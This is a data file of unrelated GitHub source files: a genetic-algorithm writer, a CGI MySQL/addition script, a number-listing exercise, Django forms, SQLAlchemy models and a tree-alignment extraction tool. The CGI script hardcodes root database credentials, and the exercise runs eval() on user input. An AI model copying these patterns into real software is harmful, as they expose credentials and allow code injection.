individual in enumerate(list_of_individuals):\n #print(ind_count, individual.input_file_string)\n write_string = self.write_options_funct(output_file, individual)\n # print(\"writing out child:\", self.generation, ind_count, write_string)\n output_file.write(write_string + \"\\n\")\n\n output_file.close()\n\n def write_options_funct(self, output_file, individual):\n write_string = \"\"\n for write_option in self.options['output_writeout_values']:\n if \"#\" in write_option:\n write_option_split = write_option.split(\"#\")\n write_option = write_option_split[0]\n if write_option == 'generation':\n write_string += str(self.generation) + \",\"\n if write_option == 'individual_count':\n write_string += str(individual.ind_count) + \",\"\n if write_option == 'keff':\n write_string += str(individual.keff) + \",\"\n if write_option == 'front_rank':\n try:\n write_string += str(individual.front_rank) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'crowding_distance':\n try:\n write_string += str(individual.crowding_distance) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'total_flux':\n try:\n write_string += str(individual.total_flux) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'representativity':\n try:\n write_string += str(individual.representativity) + \",\"\n except:\n write_string += \"N/A,\"\n if write_option == 'materials':\n write_string += str(individual.make_material_string_csv())\n if write_option == 'input_name':\n try:\n write_string += str(individual.input_file_string) + ','\n except:\n write_string += \"N/A,\"\n if write_option == 'number_of_fuel':\n 
write_string += str(individual.count_material(1)) + ','\n if write_option == 'write_out_parents':\n write_string += str(individual.parent_string) + ','\n if write_option == 'write_out_average_diversity_score':\n if self.options['choose_parent_based_on_bitwise_diversity'] == True:\n try:\n average_tds = individual.total_diversity_score / (self.options['number_of_parents'] - 1)\n write_string += str(average_tds) + ','\n except:\n write_string += \"N/A,\"\n else:\n write_string += \"N/A,\"\n return write_string\n\n def create_header(self):\n header_string = \"\"\n for val in self.options['output_writeout_values']:\n if \"#\" in val:\n val_split = val.split(\"#\")\n val = val_split[0]\n val_range = int(val_split[1])\n for _ in range(val_range):\n header_string += val + str(_)+ \",\"\n else:\n header_string += val + \",\"\n\n return header_string\n","repo_name":"jpevey/FNS_GA_v3","sub_path":"Genetic_Algorithm.py","file_name":"Genetic_Algorithm.py","file_ext":"py","file_size_in_byte":42426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74599689851","text":"#!/usr/bin/env python3\n\n###########################################################################\nprint('Content-Type:text/html') #HTML is following\nprint(\"\") #Leave a blank line\n\n###########################################################################\n\nimport mysql.connector\nfrom mysql.connector import Error\n\nconn = None\ntry:\n conn = mysql.connector.connect(host='localhost',\n database='python_mysql',\n user='root',\n password='Admin')\n if conn.is_connected():\n print('<p>Connected to MySQL database</p>')\n######## \n try:\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM books\")\n row = cursor.fetchone()\n while row is not None:\n print('<p>',row,'</p>')\n row = cursor.fetchone()\n except Error as e:\n print('<p>',e,'</p>')\n finally:\n cursor.close()\n print('<p>Cursor closed</p>')\n######## \n else:\n print('<p>Unable to connect to MySQL database</p>')\n\nexcept Error as e:\n print('<p>',e,'</p>')\n\nfinally:\n if conn is not None and conn.is_connected():\n conn.close()\n print('<p>Connection closed</p>')\n\n###########################################################################\n\nimport cgi\nimport cgitb\ncgitb.enable()\n\ninput_data=cgi.FieldStorage()\n\nprint('<h1>Addition Results</h1>')\ntry:\n num1=int(input_data[\"num1\"].value)\n num2=int(input_data[\"num2\"].value)\nexcept:\n print('<p>Sorry, we cannot turn your inputs into numbers (integers).</p>')\n# return(1)\nsum=num1+num2\nprint('<p>{0} + {1} = {2}</p>'.format(num1,num2,sum))\n\n","repo_name":"jiatinglu99/travboard","sub_path":"temp/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28481676251","text":"A,B=map(eval,input().split(' '))\nl=[]\nfor i in range(A,B+1):\n l.append(str(i))\nn=len(l)\nm=0\nwhile m<n:\n if n-m<5:\n print(' '+' '.join(l[m:]))\n else:\n str=(' '.join(l[m:m+5]))\n print(' '+str)\n m+=5\nsum=0\nfor j in l:\n sum+=eval(j)\nprint('sum={}'.format(sum))","repo_name":"gschen/where2go-python-test","sub_path":"1906101103王自强/15周练习/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"2170315636","text":"from django import forms\nfrom django.forms import ModelForm\nfrom app.models import *\n\nclass 
LoginForm(forms.Form):\n\tusuario =forms.CharField(widget=forms.TextInput())\n\tpassword=forms.CharField(widget=forms.PasswordInput(render_value=False))\n\nclass RubroForm(ModelForm):\n\tname = forms.CharField(label=\"Nombre\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Nombre del rubro'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del rubro'}))\n\tbudgeted_amount = forms.CharField(label=\"Monto presupuestado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Monto presupuestado del rubro'}))\n\treal_amount = forms.CharField(label=\"Monto real\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Monto real del rubro'}))\n\tstatus = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estad del rubro ej: Activo o Inactivo'}))\n\tarea = forms.ModelChoiceField(label=\"Area\", queryset=Area.objects.all(), widget=forms.Select(attrs={'class':'form-control'}))\n\n\tclass Meta:\n\t\tmodel=Rubro\n\t\texclude=[]\n\nclass AreaForm(ModelForm):\n\tname = forms.CharField(label=\"Nombre\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Nombre la descripcion'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del area'}))\n\tstatus = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del area ej: Activo o Inactivo'}))\n\n\tclass Meta:\n\t\tmodel=Area\n\t\texclude=[]\n\nclass BudgetForm(ModelForm):\n\tname = forms.CharField(label=\"Nombre\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Nombre la presupuesto'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del presupuesto'}))\n\tstatus = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del presupuesto ej: Activo o Inactivo'}))\n\trubro = forms.ModelChoiceField(label=\"Rubro\", queryset=Rubro.objects.all(), widget=forms.Select(attrs={'class':'form-control'}))\n\n\tclass Meta:\n\t\tmodel=Budget\n\t\texclude=[]\n\nclass ParameterForm(ModelForm):\n\tattribute = forms.CharField(label=\"Atributo\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Atributo del parametro'}))\n\tdescription = forms.CharField(label=\"Descripcion\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Descripcion del parametro'}))\n\tstatus_parameter = forms.CharField(label=\"Estado\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del parametri ej: A o I'}))\n\n\tclass Meta:\n\t\tmodel=Parameter\n\t\texclude=[]\n\nclass ValueParameterForm(ModelForm):\n\tvalue = forms.CharField(label=\"Valor\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Valor del parametro'}))\n\tparameter = forms.ModelChoiceField(label=\"Parametro\", queryset=Parameter.objects.all(), widget=forms.Select(attrs={'class':'form-control'}))\n\torder = forms.CharField(label=\"Orden\", widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Orden del valor parametro'}))\n\tstatus_value_parameter = forms.CharField(label=\"Estado\", 
widget=forms.TextInput(attrs={'class':'form-control',\n\t\t\t 'placeholder':'Estado del valor parametro ej: A o I'}))\n\n\tclass Meta:\n\t\tmodel=ValueParameter\n\t\texclude=[]\n","repo_name":"mperezlamadrid/presupuestapp","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16034357608","text":"from sqlalchemy import Integer, String, Column, Float, ForeignKey\n\nfrom database import Base\n\n\nclass Product_DB(Base):\n __tablename__ = \"products\"\n id = Column(Integer, primary_key=True, autoincrement=True)\n name = Column(String, nullable=False, unique=True)\n price = Column(Float, nullable=False)\n\nclass Cart_DB(Base):\n __tablename__ = \"cart\"\n id = Column(Integer, primary_key=True, autoincrement=True)\n product_id = Column(Integer, ForeignKey(\"products.id\"), unique=True)\n amount = Column(Integer, nullable=False)\n total_price = Column(Float, nullable=False)\n","repo_name":"DrLoon/ElectronicShop","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16682257625","text":"#!/usr/bin/python\nfrom __future__ import print_function\n\nfrom collections import defaultdict\nimport logging\nfrom multiprocessing import Pool, Lock\nimport sys, os, argparse, traceback\nimport simplejson\nimport time\n\nfrom alignment.printing import (PrintDefaultAlignment, PrintGeneralInfo,\n PrintSentencePairInfo, PrintRule)\nfrom extraction.extractor_beam import GetAlignmentFromDerivation\nfrom extraction.feat_instantiator import FeatureInstantiator\nfrom training.transducer import xT\nfrom training.wrtg import SourceProjectionFromDerivationStrict\nfrom utils.tools_generic_transducer import LoadCorpus\nfrom utils.tree_tools import IsString, tree_or_string\n\nlock = Lock()\nRuleExtractor = None\noptions = None\n\nclass ExtractorParser:\n\n def __init__(self, option):\n self.__input\t\t= option.input\n self.__cores\t\t= option.cores\n self.__initial_state\t= option.initial_state\n # Control search space and model expressivity.\n self.__kMaxSrcDepth\t\t= option.kMaxSrcDepth\n self.__kMaxSrcBranches\t= option.kMaxSrcBranches\n self.__kDefaultRunTime\t= option.kDefaultRunTime\n self.__kBeamSize = option.kBeamSize\n self.__phrase_length = option.phrase_length\n self.__n_best\t\t= option.n_best\n self.__dictDir\t\t= option.dictDir\n self.__src_empty\t\t= option.src_empty\n self.__deletions = option.deletions\n # Control feature extraction for discriminative training.\n self.__feat_inst = option.feat_inst\n # Individual features.\n self.__lscsse\t\t= option.lscsse\n self.__lscls\t\t= option.lscls\n self.__lscnd\t\t= option.lscnd\n self.__lscind\t\t= option.lscind\n self.__lsctc\t\t= option.lsctc\n self.__lslex\t\t= option.lslex\n self.__lsnsqa\t\t= option.lsnsqa\n self.__lsapprox\t\t= option.lsapprox\n self.__lsdict = option.lsdict\n self.__lsdictp = option.lsdictp\n ## Entity, predicate and bridging using dictionaries.\n self.__lsdictent\t\t= option.lsdictent\n self.__lsdictbent\t\t= option.lsdictbent\n self.__lsdictpred\t\t= option.lsdictpred\n self.__lsfuzzypred\t\t= option.lsfuzzypred\n self.__lssempred\t\t= option.lssempred\n self.__lssempredfuzzy\t= option.lssempredfuzzy\n ## Entity, predicate and bridging using Solr index.\n self.__lsent\t\t= option.lsent\n self.__lsbent\t\t= option.lsbent\n self.__lspred\t\t= 
option.lspred\n self.__lsvari\t\t= option.lsvari\n self.__lsenti\t\t= option.lsenti\n self.__lswildrecog\t\t= option.lswildrecog\n # General features.\n self.__lsnp\t\t = option.lsnp\n self.__lsvar\t\t= option.lsvar\n self.__lsentdiff\t\t= option.lsentdiff\n self.__lscomp\t\t= option.lscomp\n self.__lssize\t\t= option.lssize\n self.__lscount\t\t= option.lscount\n self.__lspdc\t\t= option.lspdc\n self.__lspnsp\t\t= option.lspnsp\n self.__lsphdwc\t\t= option.lsphdwc\n self.__lsphpc\t\t= option.lsphpc\n self.__lsphpca\t\t= option.lsphpca\n self.__lsrules\t\t= option.lsrules\n self.__nostrings\t\t= option.nostrings\n self.__lsalign\t\t= option.lsalign\n # Guesser features.\n self.__lsphpcag\t\t= option.lsphpcag\n self.__lsfree\t\t= option.lsfree\n self.__lsurisurf\t\t= option.lsurisurf\n self.__lsbridge\t\t= option.lsbridge\n self.__lsphnsp\t\t= option.lsphnsp\n self.__lsphlsp\t\t= option.lsphlsp\n self.__lsphpcg\t\t= option.lsphpcg\n self.__fmtPrint = option.fmtPrint\n self.__similarity_scorer \t= None\n self.__similarity_score_guesser = None\n\n def run(self):\n\n # Corpus is a list of [src_tree, trg_tree]s.\n corpus = LoadCorpus(self.__input)\n # Adding the sentence number to act as identifier.\n corpus = [(i, src, trg) for i, (src, trg) in enumerate(corpus)]\n\n # Loading features:\n individual_features = []\n general_features = []\n guesser_features = []\n \n if self.__lscsse:\n from linguistics.similarity import SimilarityScorerEnsemble\n\n if self.__lscls:\n from linguistics.similarity_costs import LeafSimilarity\n guesser_features.append(LeafSimilarity(self.__lscls))\n if self.__lscnd:\n from linguistics.similarity_costs import NodesDifference\n general_features.append(NodesDifference(self.__lscnd))\n if self.__lscind:\n from linguistics.similarity_semantics import InnerNodesDifference\n general_features.append(InnerNodesDifference(self.__lscind))\n if self.__lsctc:\n from linguistics.similarity_costs import TreeComplexity\n general_features.append(TreeComplexity(self.__lsctc))\n if self.__nostrings:\n from linguistics.similarity_logics import StringRulesInfiniteCost\n feature_weight, side = self.__nostrings\n general_features.append(\n StringRulesInfiniteCost(float(feature_weight), side))\n if self.__lsalign:\n from linguistics.similarity_align import AlignmentCost\n align_fname, feature_weight = self.__lsalign\n general_features.append(AlignmentCost(align_fname, float(feature_weight)))\n\n if self.__lslex:\n from linguistics.similarity_costs import LexicalSimilarity\n individual_features.append(LexicalSimilarity(self.__lslex))\n if self.__lsvari:\n from linguistics.similarity_semantics import VariableDifferenceIndividual\n individual_features.append(VariableDifferenceIndividual(self.__lsvari))\n if self.__lsenti:\n from linguistics.similarity_semantics import EntityDifferenceIndividual\n individual_features.append(EntityDifferenceIndividual(self.__lsenti))\n if self.__lsvar:\n from linguistics.similarity_semantics import VariableDifference\n general_features.append(VariableDifference(self.__lsvar))\n if self.__lsentdiff:\n from linguistics.similarity_semantics import EntityDifference\n general_features.append(EntityDifference(self.__lsentdiff))\n if self.__lscomp:\n from linguistics.similarity_semantics import TreeDifferenceComplexity\n general_features.append(TreeDifferenceComplexity(self.__lscomp))\n if self.__lssize:\n from linguistics.similarity_semantics import TreeSize\n general_features.append(TreeSize(self.__lssize))\n if self.__lsnp:\n from linguistics.similarity_qa import 
NounPhraseCost\n feature_weight, cost_np, cost_no_np = map(float, self.__lsnp)\n general_features.append(NounPhraseCost(\n feature_weight=feature_weight, cost_np=cost_np, cost_no_np=cost_no_np))\n if self.__lsrules:\n from linguistics.similarity_rules import DictionaryRules\n dict_filename, feature_weight = self.__lsrules\n individual_features.append(DictionaryRules(dict_filename, float(feature_weight)))\n if self.__lspdc:\n from linguistics.similarity_pre import DictionaryCost\n individual_features.append(DictionaryCost(self.__dictDir, self.__lspdc))\n if self.__lspnsp:\n from linguistics.similarity_pre import NoSimilarityPre\n individual_features.append(NoSimilarityPre(self.__lspnsp))\n if self.__lsnsqa:\n from linguistics.similarity_qa import NoSimilarityQA\n feat_weight, dels_cost, ins_cost, subs_cost = map(float, self.__lsnsqa)\n individual_features.append(\n NoSimilarityQA(feat_weight, dels_cost, ins_cost, subs_cost))\n if self.__lsdict:\n from linguistics.similarity_dictionary import DictionaryCost\n dict_filename, feature_weight = self.__lsdict\n individual_features.append(DictionaryCost(dict_filename, float(feature_weight)))\n\n if self.__lsdictp:\n from linguistics.similarity_dictionary_part import DictionaryCostPart\n dict_filename, feature_weight = self.__lsdictp\n individual_features.append(DictionaryCostPart(dict_filename, float(feature_weight)))\n if self.__lsdictent:\n from linguistics.similarity_dict_entities import DictEntities\n dict_filename, feature_weight = self.__lsdictent\n individual_features.append(DictEntities(dict_filename, float(feature_weight)))\n if self.__lsdictbent:\n from linguistics.similarity_dict_entities import DictBridgeEntities\n dict_filename, feature_weight = self.__lsdictbent\n individual_features.append(DictBridgeEntities(dict_filename, float(feature_weight)))\n if self.__lsdictpred:\n from linguistics.similarity_dict_entities import DictPredicates\n dict_filename, feature_weight = self.__lsdictpred\n dict_predicates = DictPredicates(dict_filename, float(feature_weight))\n individual_features.append(dict_predicates)\n if self.__lsfuzzypred:\n from linguistics.similarity_dict_entities import DictFuzzyPredicates\n dict_filename, feature_weight = self.__lsfuzzypred\n fuzzy_predicates = DictFuzzyPredicates(dict_filename, float(feature_weight))\n individual_features.append(fuzzy_predicates)\n if self.__lssempred:\n from linguistics.similarity_dict_predicates import SemprePredicates\n dict_filename, feature_weight = self.__lssempred\n sempre_predicates = SemprePredicates(dict_filename, float(feature_weight))\n individual_features.append(sempre_predicates)\n if self.__lssempredfuzzy:\n from linguistics.similarity_dict_predicates import SemprePredicatesFuzzy\n dict_filename, feature_weight = self.__lssempredfuzzy\n sempre_predicates_fuzzy = SemprePredicatesFuzzy(dict_filename, float(feature_weight))\n individual_features.append(sempre_predicates_fuzzy)\n\n # Entity/Predicate linking using an inverted index (Solr).\n if self.__lsent or self.__lsbent or self.__lspred or \\\n self.__lscount or self.__lswildrecog:\n from qald.grounding import Linker\n linker = Linker()\n else:\n linker = None\n if self.__lsent:\n from linguistics.similarity_qa import EntityLinkingCost\n feature_weight, kbest = float(self.__lsent[0]), int(self.__lsent[1])\n individual_features.append(\n EntityLinkingCost(feature_weight, kbest, linker=linker))\n if self.__lsbent:\n from linguistics.similarity_qa import BridgeLinkingCost\n feature_weight, kbest = float(self.__lsbent[0]), 
int(self.__lsbent[1])\n individual_features.append(\n BridgeLinkingCost(feature_weight, kbest, linker))\n if self.__lspred:\n from linguistics.similarity_qa import PredicateLinkingCost\n feature_weight, kbest = float(self.__lspred[0]), int(self.__lspred[1])\n individual_features.append(\n PredicateLinkingCost(feature_weight, kbest, linker))\n # These cost functions also need access to the linker.\n if self.__lscount:\n from linguistics.similarity_qa import CountOp\n general_features.append(CountOp(self.__lscount, linker))\n if self.__lswildrecog:\n from linguistics.similarity_qa import UriSurfCost\n feature_weight = float(self.__lswildrecog)\n individual_features.append(UriSurfCost(feature_weight, linker))\n\n if self.__lsphdwc:\n from linguistics.similarity_phrases import DistributedWordCost, DistributedSimilarity\n distributed_similarity = DistributedSimilarity(self.__dictDir, self.__phrase_length)\n individual_features.append(DistributedWordCost(distributed_similarity, self.__lsphdwc))\n if self.__lsphpc:\n from linguistics.similarity_phrases import PhraseCost, DistributedSimilarity\n distributed_similarity = DistributedSimilarity(self.__dictDir, self.__phrase_length)\n individual_features.append(PhraseCost(distributed_similarity, self.__lsphpc))\n if self.__lsphpca:\n from linguistics.similarity_phrases_ag import DistributedSimilarity\n from linguistics.similarity_phrases_ag import PhraseCost\n feature_weight, src_lang, trg_lang = self.__lsphpca\n distributed_similarity = \\\n DistributedSimilarity(self.__dictDir, self.__phrase_length,\n str(src_lang), str(trg_lang))\n individual_features.append(\n PhraseCost(distributed_similarity, float(feature_weight)))\n if self.__lsapprox:\n from linguistics.similarity_approx import ApproximateMatch\n individual_features.append(ApproximateMatch(self.__lsapprox))\n if self.__lsfree:\n from linguistics.similarity_freebase import EntityLinkingCost\n individual_features.append(EntityLinkingCost(self.__lsfree))\n if self.__lsurisurf:\n from linguistics.similarity_urisurf import URISurfCost\n individual_features.append(URISurfCost(self.__lsurisurf))\n if self.__lsbridge:\n from linguistics.similarity_bridge import BridgeCost\n individual_features.append(BridgeCost(self.__lsbridge))\n if self.__lsphnsp:\n from linguistics.similarity_phrases import NoSimilarityPhrases\n individual_features.append(NoSimilarityPhrases(self.__lsphnsp))\n if self.__lsphlsp:\n from linguistics.similarity_phrases import LeafSimilarityPhrases\n guesser_features.append(LeafSimilarityPhrases(self.__lsphlsp))\n if self.__lsphpcag:\n from linguistics.similarity_phrases_ag import PhraseCostGuesser\n guesser_features.append(PhraseCostGuesser(distributed_similarity, self.__lsphpcag))\n if self.__lsphpcg:\n from linguistics.similarity_phrases import PhraseCostGuesser, DistributedSimilarity\n # We are currently using the same distributd_similarity object\n # as for PhraseCost similarity function. 
This is to avoid pre-caching\n # the same phrases for the similarity function and the similarity guesser.\n # distributed_similarity = DistributedSimilarity(self.__dictDir)\n guesser_features.append(PhraseCostGuesser(distributed_similarity, self.__lsphpcg))\n\n # Using either exact search (if no beam size is specified), or approximated search.\n global RuleExtractor\n if self.__kBeamSize > 0:\n from extraction.extractor_beam import RuleExtractor as RuleExtractorApprox\n RuleExtractor = RuleExtractorApprox\n else:\n from extraction.extractor_exact import RuleExtractor as RuleExtractorExact\n RuleExtractor = RuleExtractorExact\n\n if self.__feat_inst:\n self.__feat_instantiator = FeatureInstantiator(self.__feat_inst)\n else:\n self.__feat_instantiator = None\n \n command_used = 'python -m alignment.align ' + ' '.join(sys.argv[1:])\n general_info = {'general_info' : {'kMaxSrcDepth' : self.__kMaxSrcDepth,\n 'kMaxSrcBranches' : self.__kMaxSrcBranches,\n 'kDefaultRunTime' : self.__kDefaultRunTime,\n 'kBeamSize' : self.__kBeamSize,\n 'phrase_length' : self.__phrase_length,\n 'initial_state' : self.__initial_state,\n 'command' : command_used}\n }\n general_info_str = PrintGeneralInfo(general_info, self.__fmtPrint)\n print(general_info_str, end='\\n\\n')\n\n if self.__lscsse:\n self.__similarity_scorer = \\\n SimilarityScorerEnsemble(individual_features, general_features)\n self.__similarity_score_guesser = \\\n SimilarityScorerEnsemble(guesser_features)\n else:\n self.__similarity_scorer = individual_features[0]\n self.__similarity_score_guesser = guesser_features[0]\n\n global options\n options = {'similarity_scorer' : self.__similarity_scorer,\n 'similarity_score_guesser' : self.__similarity_score_guesser,\n 'max_source_branches' : self.__kMaxSrcBranches,\n 'max_source_depth' : self.__kMaxSrcDepth,\n 'max_running_time' : self.__kDefaultRunTime,\n 'beam_size' : self.__kBeamSize,\n 'cached_extractors' : {},\n 'initial_state' : self.__initial_state,\n 'src_empty' : self.__src_empty,\n 'deletions' : self.__deletions,\n 'feat_inst' : self.__feat_instantiator,\n 'nbest' : self.__n_best,\n 'fmt' : self.__fmtPrint}\n\n try:\n if self.__cores == 1:\n self.__ObtainTransductionsFromCorpus(corpus)\n else:\n self.__ObtainTransductionsFromCorpusParallel(corpus)\n except KeyboardInterrupt:\n sys.exit(1)\n except Exception as e:\n traceback.print_exc(file=sys.stderr)\n sys.exit(255)\n finally:\n self.__similarity_scorer.Close()\n self.__similarity_score_guesser.Close()\n if self.__feat_instantiator:\n self.__feat_instantiator.Close()\n if linker:\n linker.close()\n\n def __ObtainTransductionsFromCorpusParallel(self, corpus):\n pool = Pool(processes=self.__cores, maxtasksperchild=1)\n pool.map_async(ExtractRulesFromPair, corpus).get(9999999)\n pool.close()\n pool.join()\n return\n \n def __ObtainTransductionsFromCorpus(self, corpus):\n for numbered_tree_pair in corpus:\n ExtractRulesFromPair(numbered_tree_pair)\n return\n\ndef ExtractRulesFromPair(numbered_tree_pair):\n global lock\n\n pair_num, tree_string1, tree_string2 = numbered_tree_pair\n tree1 = tree_or_string(tree_string1)\n tree2 = tree_or_string(tree_string2)\n path1, path2 = (), ()\n rule_extractor = RuleExtractor(tree1, tree2, path1, path2, options)\n\n derivations = \\\n rule_extractor.ObtainBestDerivations(options['nbest'], state_id='')\n time_spent = time.time() - rule_extractor.time_start\n if not derivations:\n derivation_cost = 1000\n alignment_str = PrintDefaultAlignment(tree1, tree2)\n tree_pair_info = {'pair_info' : \\\n {'pair_num' : 
pair_num,\n 'n_best' : -1,\n 'source' : tree_string1,\n 'target' : tree_string2,\n 'alignment' : alignment_str,\n 'cost' : derivation_cost,\n 'status' : rule_extractor.status,\n 'time' : time_spent}\n }\n else:\n for i, derivation in enumerate(derivations):\n derivation_cost = sum([rule.weight for rule in derivation])\n alignment_str = GetAlignmentFromDerivation(derivation, tree1, tree2)\n tree_pair_info = {'pair_info' : \\\n {'pair_num' : pair_num,\n 'n_best' : i,\n 'source' : tree_string1,\n 'target' : tree_string2,\n 'alignment' : alignment_str,\n 'cost' : derivation_cost,\n 'status' : rule_extractor.status,\n 'time' : time_spent}\n }\n tree_pair_info_str = \\\n PrintSentencePairInfo(tree_pair_info, fmt=options['fmt'])\n lock.acquire()\n print(tree_pair_info_str)\n for rule in derivation:\n print(PrintRule(rule, options['fmt']))\n sys.stdout.flush()\n lock.release()\n return\n\ndef main(args = None):\n\n import textwrap\n usage = \"usage: %prog [options]\"\n parser = argparse.ArgumentParser(usage)\n parser = argparse.ArgumentParser(\n prefix_chars='@',\n formatter_class=argparse.RawDescriptionHelpFormatter, \n description=textwrap.dedent('''\\\n corpus.tt (tree-tree) must contain pairs of trees like:\n ------------------------------------------------------\n NP(DT(a) NN(house))\n NP(DT(the) NN(house))\n NP(DT(a) NN(ball))\n S(NP(EX(There)) VP(VBZ(is) NP(DT(a) NN(ball))))\n ...\n '''))\n\n parser.add_argument('input',\t\t\tnargs='?',\t\ttype=str,\t\t\tdefault=sys.stdin,\tmetavar=\"INPUT\", \\\n\t\t\thelp=\"Input corpus.tt contains parallel source and target constituent trees.\")\n parser.add_argument(\"@@cores\",\t\tdest=\"cores\",\t\tnargs='?',\ttype=int,\tdefault=\"1\", \\\n\t\t help=\"CPUs to use\")\n parser.add_argument(\"@@initial_state\",\tdest=\"initial_state\",\tnargs='?',\ttype=str,\tdefault=\"start\", \\\n\t\t help=\"CPUs to use\")\n parser.add_argument(\"@@kMaxSourceDepth\",\tdest=\"kMaxSrcDepth\",\tnargs='?',\ttype=int,\tdefault=\"2\", \\\n\t\t help=\"\")\n parser.add_argument(\"@@kMaxSourceBranches\",\tdest=\"kMaxSrcBranches\",\tnargs='?',\ttype=int,\tdefault=\"3\", \\\n\t\t help=\"\")\n parser.add_argument(\"@@kDefaultRunTime\",\tdest=\"kDefaultRunTime\",\tnargs='?',\ttype=int,\tdefault=\"100\", \\\n\t\t help=\"Set the running time in second.\")\n parser.add_argument(\"@@kBeamSize\", \tdest=\"kBeamSize\",\tnargs='?',\ttype=int,\tdefault=\"0\", \\\n\t\t help=\"Set the beam size of the approximated search. If not set, exact search is performed.\")\n parser.add_argument(\"@@src_empty\", \tdest=\"src_empty\",\tnargs='?',\ttype=bool,\tdefault=True, \\\n\t\t help=\"Forbids empty (epsilon) transitions on source tree (left-hand-sides of rules). Default is True.\")\n parser.add_argument(\"@@feat_inst\", \tdest=\"feat_inst\",\tnargs='?',\tdefault='', \\\n\t\t help=\"Enables feature instantiation for discriminative training. Default is False.\")\n parser.add_argument(\"@@deletions\", \tdest=\"deletions\",\tnargs='?',\ttype=bool,\tdefault=True, \\\n\t\t help=\"Enables deletion operations. 
Default is True.\")\n parser.add_argument(\"@@phrase_length\",\tdest=\"phrase_length\",\tnargs='?',\ttype=int,\tdefault=\"1\", \\\n\t\t help=\"Maximum phrase length for similarity function.\")\n parser.add_argument(\"@@n_best\",\tdest=\"n_best\",\tnargs='?',\ttype=int,\tdefault=\"1\", \\\n\t\t help=\"Maximum number of derivations to be extracted.\")\n parser.add_argument(\"@@fmtPrint\",\t\tdest=\"fmtPrint\",\tnargs='?',\ttype=str,\tdefault=\"json\", \\\n\t\t help=\"Set the printing format, yaml or json. Default is json.\")\n parser.add_argument(\"@@dictDir\",\t\tdest=\"dictDir\",\t\tnargs='?',\ttype=str,\tdefault=\"/home/yulin/PHD/source/pascual/transducers/lex.j2e.cost.small\", \\\n\t\t help=\"The directory of the lexicon cost dictionary\")\n parser.add_argument(\"@@LSCSSE\",\t\tdest=\"lscsse\",\t\taction=\"store_true\", \\\n\t\t help=\"from linguistics.similarity import SimilarityScorerEnsemble. Default is False.\")\n parser.add_argument(\"@@LSCLS\",\t\tdest=\"lscls\",\t\taction=\"store_true\", \\\n\t\t help=\"from linguistics.similarity_costs import LeafSimilarity. Default is False.\")\n parser.add_argument(\"@@LSCND\",\t\tdest=\"lscnd\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_costs import NodesDifference. Default is False.\")\n parser.add_argument(\"@@LSCIND\",\t\tdest=\"lscind\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_semantics import InnerNodesDifference. Default is False.\")\n parser.add_argument(\"@@LSCTC\",\t\tdest=\"lsctc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_costs import TreeComplexity. Default is False.\")\n parser.add_argument(\"@@LSPDC\",\t\tdest=\"lspdc\",\t\tnargs='?',\ttype=float, \tdefault=0.0,\n\t\t help=\"from linguistics.similarity_pre import DictionaryCost. Default is False.\")\n parser.add_argument(\"@@LSDict\",\t\tdest=\"lsdict\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dictionary import DictionaryCost. Default is False.\")\n parser.add_argument(\"@@LSDictp\",\t\tdest=\"lsdictp\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dictionary_part import DictionaryCostPart. Default is False.\")\n parser.add_argument(\"@@LSDictbent\",\t\tdest=\"lsdictbent\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictBridgeEntities. Default is False.\")\n parser.add_argument(\"@@LSDictent\",\t\tdest=\"lsdictent\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictEntities. Default is False.\")\n parser.add_argument(\"@@LSDictpred\",\t\tdest=\"lsdictpred\",\t\tnargs=2,\tdefault=[],\n\t\t help=\"from linguistics.similarity_dict_entities import DictPredicates. Default is False.\")\n 